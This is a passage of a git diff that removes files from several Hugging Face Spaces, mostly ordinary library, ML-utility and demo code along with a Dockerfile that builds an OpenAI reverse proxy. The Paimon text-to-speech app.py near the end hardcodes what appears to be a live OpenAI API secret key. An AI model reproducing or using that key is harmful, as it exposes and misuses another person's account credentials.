_SequenceIterableView(object): - """Wrap an iterable returned by find_matches(). - - This is essentially just a proxy to the underlying sequence that provides - the same interface as `_FactoryIterableView`. - """ - - def __init__(self, sequence): - self._sequence = sequence - - def __repr__(self): - return "{}({})".format(type(self).__name__, self._sequence) - - def __bool__(self): - return bool(self._sequence) - - __nonzero__ = __bool__ # XXX: Python 2. - - def __iter__(self): - return iter(self._sequence) - - -def build_iter_view(matches): - """Build an iterable view from the value returned by `find_matches()`.""" - if callable(matches): - return _FactoryIterableView(matches) - if not isinstance(matches, collections_abc.Sequence): - matches = list(matches) - return _SequenceIterableView(matches) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py deleted file mode 100644 index 21b4590b3dc9b58902b0d47164b9023e54a85ef8..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/urllib3/util/wait.py +++ /dev/null @@ -1,152 +0,0 @@ -import errno -import select -import sys -from functools import partial - -try: - from time import monotonic -except ImportError: - from time import time as monotonic - -__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"] - - -class NoWayToWaitForSocketError(Exception): - pass - - -# How should we wait on sockets? -# -# There are two types of APIs you can use for waiting on sockets: the fancy -# modern stateful APIs like epoll/kqueue, and the older stateless APIs like -# select/poll. The stateful APIs are more efficient when you have a lots of -# sockets to keep track of, because you can set them up once and then use them -# lots of times. But we only ever want to wait on a single socket at a time -# and don't want to keep track of state, so the stateless APIs are actually -# more efficient. So we want to use select() or poll(). -# -# Now, how do we choose between select() and poll()? On traditional Unixes, -# select() has a strange calling convention that makes it slow, or fail -# altogether, for high-numbered file descriptors. The point of poll() is to fix -# that, so on Unixes, we prefer poll(). -# -# On Windows, there is no poll() (or at least Python doesn't provide a wrapper -# for it), but that's OK, because on Windows, select() doesn't have this -# strange calling convention; plain select() works fine. -# -# So: on Windows we use select(), and everywhere else we use poll(). We also -# fall back to select() in case poll() is somehow broken or missing. - -if sys.version_info >= (3, 5): - # Modern Python, that retries syscalls by default - def _retry_on_intr(fn, timeout): - return fn(timeout) - -else: - # Old and broken Pythons. - def _retry_on_intr(fn, timeout): - if timeout is None: - deadline = float("inf") - else: - deadline = monotonic() + timeout - - while True: - try: - return fn(timeout) - # OSError for 3 <= pyver < 3.5, select.error for pyver <= 2.7 - except (OSError, select.error) as e: - # 'e.args[0]' incantation works for both OSError and select.error - if e.args[0] != errno.EINTR: - raise - else: - timeout = deadline - monotonic() - if timeout < 0: - timeout = 0 - if timeout == float("inf"): - timeout = None - continue - - -def select_wait_for_socket(sock, read=False, write=False, timeout=None): - if not read and not write: - raise RuntimeError("must specify at least one of read=True, write=True") - rcheck = [] - wcheck = [] - if read: - rcheck.append(sock) - if write: - wcheck.append(sock) - # When doing a non-blocking connect, most systems signal success by - # marking the socket writable. Windows, though, signals success by marked - # it as "exceptional". We paper over the difference by checking the write - # sockets for both conditions. (The stdlib selectors module does the same - # thing.) - fn = partial(select.select, rcheck, wcheck, wcheck) - rready, wready, xready = _retry_on_intr(fn, timeout) - return bool(rready or wready or xready) - - -def poll_wait_for_socket(sock, read=False, write=False, timeout=None): - if not read and not write: - raise RuntimeError("must specify at least one of read=True, write=True") - mask = 0 - if read: - mask |= select.POLLIN - if write: - mask |= select.POLLOUT - poll_obj = select.poll() - poll_obj.register(sock, mask) - - # For some reason, poll() takes timeout in milliseconds - def do_poll(t): - if t is not None: - t *= 1000 - return poll_obj.poll(t) - - return bool(_retry_on_intr(do_poll, timeout)) - - -def null_wait_for_socket(*args, **kwargs): - raise NoWayToWaitForSocketError("no select-equivalent available") - - -def _have_working_poll(): - # Apparently some systems have a select.poll that fails as soon as you try - # to use it, either due to strange configuration or broken monkeypatching - # from libraries like eventlet/greenlet. - try: - poll_obj = select.poll() - _retry_on_intr(poll_obj.poll, 0) - except (AttributeError, OSError): - return False - else: - return True - - -def wait_for_socket(*args, **kwargs): - # We delay choosing which implementation to use until the first time we're - # called. We could do it at import time, but then we might make the wrong - # decision if someone goes wild with monkeypatching select.poll after - # we're imported. - global wait_for_socket - if _have_working_poll(): - wait_for_socket = poll_wait_for_socket - elif hasattr(select, "select"): - wait_for_socket = select_wait_for_socket - else: # Platform-specific: Appengine. - wait_for_socket = null_wait_for_socket - return wait_for_socket(*args, **kwargs) - - -def wait_for_read(sock, timeout=None): - """Waits for reading to be available on a given socket. - Returns True if the socket is readable, or False if the timeout expired. - """ - return wait_for_socket(sock, read=True, timeout=timeout) - - -def wait_for_write(sock, timeout=None): - """Waits for writing to be available on a given socket. - Returns True if the socket is readable, or False if the timeout expired. - """ - return wait_for_socket(sock, write=True, timeout=timeout) diff --git a/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py b/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py deleted file mode 100644 index ee4b01ddfbe8173965371b29f770f3e87615fe71..0000000000000000000000000000000000000000 --- a/spaces/CForGETaass/vits-uma-genshin-honkai/utils.py +++ /dev/null @@ -1,225 +0,0 @@ -import os -import sys -import argparse -import logging -import json -import subprocess -import numpy as np -import librosa -import torch - -MATPLOTLIB_FLAG = False - -logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) -logger = logging - - -def load_checkpoint(checkpoint_path, model, optimizer=None): - assert os.path.isfile(checkpoint_path) - checkpoint_dict = torch.load(checkpoint_path, map_location='cpu') - iteration = checkpoint_dict['iteration'] - learning_rate = checkpoint_dict['learning_rate'] - if optimizer is not None: - optimizer.load_state_dict(checkpoint_dict['optimizer']) - saved_state_dict = checkpoint_dict['model'] - if hasattr(model, 'module'): - state_dict = model.module.state_dict() - else: - state_dict = model.state_dict() - new_state_dict= {} - for k, v in state_dict.items(): - try: - new_state_dict[k] = saved_state_dict[k] - except: - logger.info("%s is not in the checkpoint" % k) - new_state_dict[k] = v - if hasattr(model, 'module'): - model.module.load_state_dict(new_state_dict) - else: - model.load_state_dict(new_state_dict) - logger.info("Loaded checkpoint '{}' (iteration {})" .format( - checkpoint_path, iteration)) - return model, optimizer, learning_rate, iteration - - -def plot_spectrogram_to_numpy(spectrogram): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(10,2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - plt.xlabel("Frames") - plt.ylabel("Channels") - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def plot_alignment_to_numpy(alignment, info=None): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(6, 4)) - im = ax.imshow(alignment.transpose(), aspect='auto', origin='lower', - interpolation='none') - fig.colorbar(im, ax=ax) - xlabel = 'Decoder timestep' - if info is not None: - xlabel += '\n\n' + info - plt.xlabel(xlabel) - plt.ylabel('Encoder timestep') - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def load_audio_to_torch(full_path, target_sampling_rate): - audio, sampling_rate = librosa.load(full_path, sr=target_sampling_rate, mono=True) - return torch.FloatTensor(audio.astype(np.float32)) - - -def load_filepaths_and_text(filename, split="|"): - with open(filename, encoding='utf-8') as f: - filepaths_and_text = [line.strip().split(split) for line in f] - return filepaths_and_text - - -def get_hparams(init=True): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', type=str, default="./configs/base.json", - help='JSON file for configuration') - parser.add_argument('-m', '--model', type=str, required=True, - help='Model name') - - args = parser.parse_args() - model_dir = os.path.join("./logs", args.model) - - if not os.path.exists(model_dir): - os.makedirs(model_dir) - - config_path = args.config - config_save_path = os.path.join(model_dir, "config.json") - if init: - with open(config_path, "r") as f: - data = f.read() - with open(config_save_path, "w") as f: - f.write(data) - else: - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_dir(model_dir): - config_save_path = os.path.join(model_dir, "config.json") - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams =HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_file(config_path): - with open(config_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams =HParams(**config) - return hparams - - -def check_git_hash(model_dir): - source_dir = os.path.dirname(os.path.realpath(__file__)) - if not os.path.exists(os.path.join(source_dir, ".git")): - logger.warn("{} is not a git repository, therefore hash value comparison will be ignored.".format( - source_dir - )) - return - - cur_hash = subprocess.getoutput("git rev-parse HEAD") - - path = os.path.join(model_dir, "githash") - if os.path.exists(path): - saved_hash = open(path).read() - if saved_hash != cur_hash: - logger.warn("git hash values are different. {}(saved) != {}(current)".format( - saved_hash[:8], cur_hash[:8])) - else: - open(path, "w").write(cur_hash) - - -def get_logger(model_dir, filename="train.log"): - global logger - logger = logging.getLogger(os.path.basename(model_dir)) - logger.setLevel(logging.DEBUG) - - formatter = logging.Formatter("%(asctime)s\t%(name)s\t%(levelname)s\t%(message)s") - if not os.path.exists(model_dir): - os.makedirs(model_dir) - h = logging.FileHandler(os.path.join(model_dir, filename)) - h.setLevel(logging.DEBUG) - h.setFormatter(formatter) - logger.addHandler(h) - return logger - - -class HParams(): - def __init__(self, **kwargs): - for k, v in kwargs.items(): - if type(v) == dict: - v = HParams(**v) - self[k] = v - - def keys(self): - return self.__dict__.keys() - - def items(self): - return self.__dict__.items() - - def values(self): - return self.__dict__.values() - - def __len__(self): - return len(self.__dict__) - - def __getitem__(self, key): - return getattr(self, key) - - def __setitem__(self, key, value): - return setattr(self, key, value) - - def __contains__(self, key): - return key in self.__dict__ - - def __repr__(self): - return self.__dict__.__repr__() diff --git a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py b/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py deleted file mode 100644 index 3ad346661f84b0647026e130a552c4b38b83e2ac..0000000000000000000000000000000000000000 --- a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/segment_anything/utils/transforms.py +++ /dev/null @@ -1,102 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import numpy as np -import torch -from torch.nn import functional as F -from torchvision.transforms.functional import resize, to_pil_image # type: ignore - -from copy import deepcopy -from typing import Tuple - - -class ResizeLongestSide: - """ - Resizes images to longest side 'target_length', as well as provides - methods for resizing coordinates and boxes. Provides methods for - transforming both numpy array and batched torch tensors. - """ - - def __init__(self, target_length: int) -> None: - self.target_length = target_length - - def apply_image(self, image: np.ndarray) -> np.ndarray: - """ - Expects a numpy array with shape HxWxC in uint8 format. - """ - target_size = self.get_preprocess_shape(image.shape[0], image.shape[1], self.target_length) - return np.array(resize(to_pil_image(image), target_size)) - - def apply_coords(self, coords: np.ndarray, original_size: Tuple[int, ...]) -> np.ndarray: - """ - Expects a numpy array of length 2 in the final dimension. Requires the - original image size in (H, W) format. - """ - old_h, old_w = original_size - new_h, new_w = self.get_preprocess_shape( - original_size[0], original_size[1], self.target_length - ) - coords = deepcopy(coords).astype(float) - coords[..., 0] = coords[..., 0] * (new_w / old_w) - coords[..., 1] = coords[..., 1] * (new_h / old_h) - return coords - - def apply_boxes(self, boxes: np.ndarray, original_size: Tuple[int, ...]) -> np.ndarray: - """ - Expects a numpy array shape Bx4. Requires the original image size - in (H, W) format. - """ - boxes = self.apply_coords(boxes.reshape(-1, 2, 2), original_size) - return boxes.reshape(-1, 4) - - def apply_image_torch(self, image: torch.Tensor) -> torch.Tensor: - """ - Expects batched images with shape BxCxHxW and float format. This - transformation may not exactly match apply_image. apply_image is - the transformation expected by the model. - """ - # Expects an image in BCHW format. May not exactly match apply_image. - target_size = self.get_preprocess_shape(image.shape[0], image.shape[1], self.target_length) - return F.interpolate( - image, target_size, mode="bilinear", align_corners=False, antialias=True - ) - - def apply_coords_torch( - self, coords: torch.Tensor, original_size: Tuple[int, ...] - ) -> torch.Tensor: - """ - Expects a torch tensor with length 2 in the last dimension. Requires the - original image size in (H, W) format. - """ - old_h, old_w = original_size - new_h, new_w = self.get_preprocess_shape( - original_size[0], original_size[1], self.target_length - ) - coords = deepcopy(coords).to(torch.float) - coords[..., 0] = coords[..., 0] * (new_w / old_w) - coords[..., 1] = coords[..., 1] * (new_h / old_h) - return coords - - def apply_boxes_torch( - self, boxes: torch.Tensor, original_size: Tuple[int, ...] - ) -> torch.Tensor: - """ - Expects a torch tensor with shape Bx4. Requires the original image - size in (H, W) format. - """ - boxes = self.apply_coords_torch(boxes.reshape(-1, 2, 2), original_size) - return boxes.reshape(-1, 4) - - @staticmethod - def get_preprocess_shape(oldh: int, oldw: int, long_side_length: int) -> Tuple[int, int]: - """ - Compute the output size given input size and target long side length. - """ - scale = long_side_length * 1.0 / max(oldh, oldw) - newh, neww = oldh * scale, oldw * scale - neww = int(neww + 0.5) - newh = int(newh + 0.5) - return (newh, neww) diff --git a/spaces/Cat125/text-generator-v3/classes.py b/spaces/Cat125/text-generator-v3/classes.py deleted file mode 100644 index c14da7c59c362806097db38804f1942b31a37fad..0000000000000000000000000000000000000000 --- a/spaces/Cat125/text-generator-v3/classes.py +++ /dev/null @@ -1,28 +0,0 @@ -# import pymorphy3 - -# morph = pymorphy3.MorphAnalyzer() - -# The Token class takes in a token, previous token, text, all tokens, token index, and a boolean value and creates a -# token object with attributes such as score and contexts. -class Token: - def __init__(self, token, prev_token, text, tokens, i, turbo = False): - self.token = token - self.prev_token = prev_token - self.score = 0 - self.contexts = [] - for t in tokens[i-10:i+10]: - # if turbo: - self.contexts.append(t) - # continue - # result = morph.parse(w) - # if len(result) == 0: - # continue - # result = result[0] - # if 'LATN' in result.tag: - # continue - # if result.tag.POS == 'NOUN': - # self.contexts.append(t) - # self.contexts.append(result.normal_form) - - def __repr__(self): - return f"'{self.prev_token} > {self.token} ({len(self.contexts)} contexts)'" \ No newline at end of file diff --git a/spaces/Cat125/text-generator-v3/train.py b/spaces/Cat125/text-generator-v3/train.py deleted file mode 100644 index 8f22f6003a95565cbf5835165e962cf43509a558..0000000000000000000000000000000000000000 --- a/spaces/Cat125/text-generator-v3/train.py +++ /dev/null @@ -1,65 +0,0 @@ -import argparse -import re -from pprint import pprint - -from tokenizers import Tokenizer -from tqdm import trange - -from classes import Token -from datamanager import get_data, get_texts, models, set_data, set_data_v3 - -turbo = False -tokenizer = Tokenizer.from_pretrained("bert-base-uncased") - -def process_text(db, db3, text): - tokens = tokenizer.encode(text).ids - for i in trange(0, len(tokens), colour="green", unit="tokens"): - token = tokens[i] - prev_token = 0 if i == 0 else tokens[i - 1] - t = Token(token, prev_token, text, tokens, turbo) - if t not in db: - db.append(t) - if prev_token not in db3: - db3[prev_token] = [] - db3[prev_token].append(t) - -def train(model_name): - db = [] - db3 = {} - print(f'Rebuilding database for "{model_name}"...') - k = 0 - texts = get_texts(model_name) - total_texts = len(texts) - for text in texts: - k += 1 - print(f'Processing text {k} of {total_texts}...') - process_text(db, db3, text) - - set_data(model_name, db) - models[model_name]["db"] = db - set_data_v3(model_name, db3) - models[model_name]["db3"] = db3 - -if __name__ == '__main__': - parser = argparse.ArgumentParser( - prog='Text Generator v3', - description='Generates text from a text file') - parser.add_argument('-r', '--rebuild', action='extend', nargs="+", type=str) - parser.add_argument('-l', '--log', action='extend', nargs="+", type=str) - parser.add_argument('-t', '--turbo', action='store_true') - args = parser.parse_args() - - if args.rebuild: - models_to_rebuild = args.rebuild - if args.rebuild[0] in ('*', 'all'): - models_to_rebuild = list(models.keys()) - for model in models_to_rebuild: - if model not in models: - raise ValueError("Model '%s' not found" % model) - turbo = args.turbo - train(model) - if args.log: - for model in args.log: - if model not in models: - raise ValueError("Model '%s' not found" % model) - pprint(get_data(model)) diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py deleted file mode 100644 index f2dfc29ec4b5d1cbf37a87fe7ce70fff27b022a5..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/altair/utils/server.py +++ /dev/null @@ -1,148 +0,0 @@ -""" -A Simple server used to show altair graphics from a prompt or script. - -This is adapted from the mpld3 package; see -https://github.com/mpld3/mpld3/blob/master/mpld3/_server.py -""" -import sys -import threading -import webbrowser -import socket -from http import server -from io import BytesIO as IO -import itertools -import random - -JUPYTER_WARNING = """ -Note: if you're in the Jupyter notebook, Chart.serve() is not the best - way to view plots. Consider using Chart.display(). -You must interrupt the kernel to cancel this command. -""" - - -# Mock server used for testing - - -class MockRequest: - def makefile(self, *args, **kwargs): - return IO(b"GET /") - - def sendall(self, response): - pass - - -class MockServer: - def __init__(self, ip_port, Handler): - Handler(MockRequest(), ip_port[0], self) - - def serve_forever(self): - pass - - def server_close(self): - pass - - -def generate_handler(html, files=None): - if files is None: - files = {} - - class MyHandler(server.BaseHTTPRequestHandler): - def do_GET(self): - """Respond to a GET request.""" - if self.path == "/": - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html.encode()) - elif self.path in files: - content_type, content = files[self.path] - self.send_response(200) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(content.encode()) - else: - self.send_error(404) - - return MyHandler - - -def find_open_port(ip, port, n=50): - """Find an open port near the specified port""" - ports = itertools.chain( - (port + i for i in range(n)), (port + random.randint(-2 * n, 2 * n)) - ) - - for port in ports: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - result = s.connect_ex((ip, port)) - s.close() - if result != 0: - return port - raise ValueError("no open ports found") - - -def serve( - html, - ip="127.0.0.1", - port=8888, - n_retries=50, - files=None, - jupyter_warning=True, - open_browser=True, - http_server=None, -): - """Start a server serving the given HTML, and (optionally) open a browser - - Parameters - ---------- - html : string - HTML to serve - ip : string (default = '127.0.0.1') - ip address at which the HTML will be served. - port : int (default = 8888) - the port at which to serve the HTML - n_retries : int (default = 50) - the number of nearby ports to search if the specified port is in use. - files : dictionary (optional) - dictionary of extra content to serve - jupyter_warning : bool (optional) - if True (default), then print a warning if this is used within Jupyter - open_browser : bool (optional) - if True (default), then open a web browser to the given HTML - http_server : class (optional) - optionally specify an HTTPServer class to use for showing the - figure. The default is Python's basic HTTPServer. - """ - port = find_open_port(ip, port, n_retries) - Handler = generate_handler(html, files) - - if http_server is None: - srvr = server.HTTPServer((ip, port), Handler) - else: - srvr = http_server((ip, port), Handler) - - if jupyter_warning: - try: - __IPYTHON__ # noqa - except NameError: - pass - else: - print(JUPYTER_WARNING) - - # Start the server - print("Serving to http://{}:{}/ [Ctrl-C to exit]".format(ip, port)) - sys.stdout.flush() - - if open_browser: - # Use a thread to open a web browser pointing to the server - def b(): - return webbrowser.open("http://{}:{}".format(ip, port)) - - threading.Thread(target=b).start() - - try: - srvr.serve_forever() - except (KeyboardInterrupt, SystemExit): - print("\nstopping Server...") - - srvr.server_close() diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py deleted file mode 100644 index 6aac5f7c22395759ebe3d5633d2adcf1f4ff1fe5..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/abc/_sockets.py +++ /dev/null @@ -1,160 +0,0 @@ -from __future__ import annotations - -import socket -from abc import abstractmethod -from contextlib import AsyncExitStack -from io import IOBase -from ipaddress import IPv4Address, IPv6Address -from socket import AddressFamily -from typing import ( - Any, - Callable, - Collection, - Mapping, - Tuple, - TypeVar, - Union, -) - -from .._core._tasks import create_task_group -from .._core._typedattr import ( - TypedAttributeProvider, - TypedAttributeSet, - typed_attribute, -) -from ._streams import ByteStream, Listener, UnreliableObjectStream -from ._tasks import TaskGroup - -IPAddressType = Union[str, IPv4Address, IPv6Address] -IPSockAddrType = Tuple[str, int] -SockAddrType = Union[IPSockAddrType, str] -UDPPacketType = Tuple[bytes, IPSockAddrType] -T_Retval = TypeVar("T_Retval") - - -class SocketAttribute(TypedAttributeSet): - #: the address family of the underlying socket - family: AddressFamily = typed_attribute() - #: the local socket address of the underlying socket - local_address: SockAddrType = typed_attribute() - #: for IP addresses, the local port the underlying socket is bound to - local_port: int = typed_attribute() - #: the underlying stdlib socket object - raw_socket: socket.socket = typed_attribute() - #: the remote address the underlying socket is connected to - remote_address: SockAddrType = typed_attribute() - #: for IP addresses, the remote port the underlying socket is connected to - remote_port: int = typed_attribute() - - -class _SocketProvider(TypedAttributeProvider): - @property - def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: - from .._core._sockets import convert_ipv6_sockaddr as convert - - attributes: dict[Any, Callable[[], Any]] = { - SocketAttribute.family: lambda: self._raw_socket.family, - SocketAttribute.local_address: lambda: convert( - self._raw_socket.getsockname() - ), - SocketAttribute.raw_socket: lambda: self._raw_socket, - } - try: - peername: tuple[str, int] | None = convert(self._raw_socket.getpeername()) - except OSError: - peername = None - - # Provide the remote address for connected sockets - if peername is not None: - attributes[SocketAttribute.remote_address] = lambda: peername - - # Provide local and remote ports for IP based sockets - if self._raw_socket.family in (AddressFamily.AF_INET, AddressFamily.AF_INET6): - attributes[ - SocketAttribute.local_port - ] = lambda: self._raw_socket.getsockname()[1] - if peername is not None: - remote_port = peername[1] - attributes[SocketAttribute.remote_port] = lambda: remote_port - - return attributes - - @property - @abstractmethod - def _raw_socket(self) -> socket.socket: - pass - - -class SocketStream(ByteStream, _SocketProvider): - """ - Transports bytes over a socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - -class UNIXSocketStream(SocketStream): - @abstractmethod - async def send_fds(self, message: bytes, fds: Collection[int | IOBase]) -> None: - """ - Send file descriptors along with a message to the peer. - - :param message: a non-empty bytestring - :param fds: a collection of files (either numeric file descriptors or open file or socket - objects) - """ - - @abstractmethod - async def receive_fds(self, msglen: int, maxfds: int) -> tuple[bytes, list[int]]: - """ - Receive file descriptors along with a message from the peer. - - :param msglen: length of the message to expect from the peer - :param maxfds: maximum number of file descriptors to expect from the peer - :return: a tuple of (message, file descriptors) - """ - - -class SocketListener(Listener[SocketStream], _SocketProvider): - """ - Listens to incoming socket connections. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - @abstractmethod - async def accept(self) -> SocketStream: - """Accept an incoming connection.""" - - async def serve( - self, - handler: Callable[[SocketStream], Any], - task_group: TaskGroup | None = None, - ) -> None: - async with AsyncExitStack() as exit_stack: - if task_group is None: - task_group = await exit_stack.enter_async_context(create_task_group()) - - while True: - stream = await self.accept() - task_group.start_soon(handler, stream) - - -class UDPSocket(UnreliableObjectStream[UDPPacketType], _SocketProvider): - """ - Represents an unconnected UDP socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ - - async def sendto(self, data: bytes, host: str, port: int) -> None: - """Alias for :meth:`~.UnreliableObjectSendStream.send` ((data, (host, port))).""" - return await self.send((data, (host, port))) - - -class ConnectedUDPSocket(UnreliableObjectStream[bytes], _SocketProvider): - """ - Represents an connected UDP socket. - - Supports all relevant extra attributes from :class:`~SocketAttribute`. - """ diff --git a/spaces/Dagfinn1962/prodia2/flipper.py b/spaces/Dagfinn1962/prodia2/flipper.py deleted file mode 100644 index 823edc9f8f6be2de3051710490acc8375a100b3d..0000000000000000000000000000000000000000 --- a/spaces/Dagfinn1962/prodia2/flipper.py +++ /dev/null @@ -1,31 +0,0 @@ -import numpy as np -import gradio as gr - - -def flip_text(x): - return x[::-1] - - -def flip_image(x): - return np.fliplr(x) - - -with gr.Blocks() as demo: - gr.Markdown("Flip text or image files using this demo.") - with gr.Tab("Flip Text"): - text_input = gr.Textbox() - text_output = gr.Textbox() - text_button = gr.Button("Flip") - with gr.Tab("Flip Image"): - with gr.Row(): - image_input = gr.Image() - image_output = gr.Image() - image_button = gr.Button("Flip") - - with gr.Accordion("Open for More!"): - gr.Markdown("Look at me...") - - text_button.click(flip_text, inputs=text_input, outputs=text_output) - image_button.click(flip_image, inputs=image_input, outputs=image_output) - -demo.launch() \ No newline at end of file diff --git a/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py b/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py deleted file mode 100644 index 3654f11d0fe7b3f113bcf9af4a7f43807bf31a79..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/3D-Room-Layout-Estimation_LGT-Net/models/other/init_env.py +++ /dev/null @@ -1,37 +0,0 @@ -""" -@Date: 2021/08/15 -@description: -""" -import random -import torch -import torch.backends.cudnn as cudnn -import numpy as np -import os -import cv2 - - -def init_env(seed, deterministic=False, loader_work_num=0): - # Fix seed - # Python & NumPy - np.random.seed(seed) - random.seed(seed) - os.environ['PYTHONHASHSEED'] = str(seed) - - # PyTorch - torch.manual_seed(seed) # 为CPU设置随机种子 - if torch.cuda.is_available(): - torch.cuda.manual_seed(seed) # 为当前GPU设置随机种子 - torch.cuda.manual_seed_all(seed) # 为所有GPU设置随机种子 - - # cuDNN - if deterministic: - # 复现 - torch.backends.cudnn.benchmark = False - torch.backends.cudnn.deterministic = True # 将这个 flag 置为 True 的话,每次返回的卷积算法将是确定的,即默认算法 - else: - cudnn.benchmark = True # 如果网络的输入数据维度或类型上变化不大,设置true - torch.backends.cudnn.deterministic = False - - # Using multiple threads in Opencv can cause deadlocks - if loader_work_num != 0: - cv2.setNumThreads(0) diff --git a/spaces/DollieHell/pisa/Dockerfile b/spaces/DollieHell/pisa/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/DollieHell/pisa/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md b/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md deleted file mode 100644 index 0754c3e470f91669b1c889092f5f385ec1817beb..0000000000000000000000000000000000000000 --- a/spaces/DuckyPolice/DeciDiffusion-v1-0/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: DeciDiffusion-v1-0 -emoji: 🐨 -colorFrom: purple -colorTo: indigo -sdk: gradio -sdk_version: 3.43.2 -app_file: app.py -pinned: true -disable_embedding: true -inference: true ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/EDGAhab/Paimon-Talking/app.py b/spaces/EDGAhab/Paimon-Talking/app.py deleted file mode 100644 index 6a59e159d38b5c9a8cb59c146bcdcc0b971d1cfe..0000000000000000000000000000000000000000 --- a/spaces/EDGAhab/Paimon-Talking/app.py +++ /dev/null @@ -1,97 +0,0 @@ -import gradio as gr -import os -os.system('cd monotonic_align && python setup.py build_ext --inplace && cd ..') -import torch - -import commons -import utils -from models import SynthesizerTrn -from text.symbols import symbols -from text import text_to_sequence - -import IPython.display as ipd - -import json -import math - -#new imports -import matplotlib.pyplot as plt -import re - -from torch import nn -from torch.nn import functional as F -from torch.utils.data import DataLoader - -from models import SynthesizerTrn -import unicodedata -import openai - -def get_text(text, hps): - text_norm = text_to_sequence(text, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = torch.LongTensor(text_norm) - return text_norm - -hps = utils.get_hparams_from_file("configs/biaobei_base.json") - -net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - **hps.model) -_ = net_g.eval() - -_ = utils.load_checkpoint("G_1434000.pth", net_g, None) - -def friend_chat(text, tts_input3): - call_name = "亚托克斯" - openai.api_key = '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' - identity = tts_input3 - start_sequence = '\n'+str(call_name)+':' - restart_sequence = "\nYou: " - all_text = identity + restart_sequence - if 1 == 1: - prompt0 = text #当期prompt - if text == 'quit': - return prompt0 - prompt = identity + prompt0 + start_sequence - - response = openai.Completion.create( - model="text-davinci-003", - prompt=prompt, - temperature=0.5, - max_tokens=1000, - top_p=1.0, - frequency_penalty=0.5, - presence_penalty=0.0, - stop=["\nYou:"] - ) - return response['choices'][0]['text'].strip() - -def sle(text, tts_input3): - text = friend_chat(text, tts_input3).replace('\n','。').replace(' ',',') - return text - -def infer(text,tts_input3): - stn_tst = get_text(sle(text,tts_input3), hps) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0) - x_tst_lengths = torch.LongTensor([stn_tst.size(0)]) - audio = net_g.infer(x_tst, x_tst_lengths, noise_scale=.667, noise_scale_w=0.8, 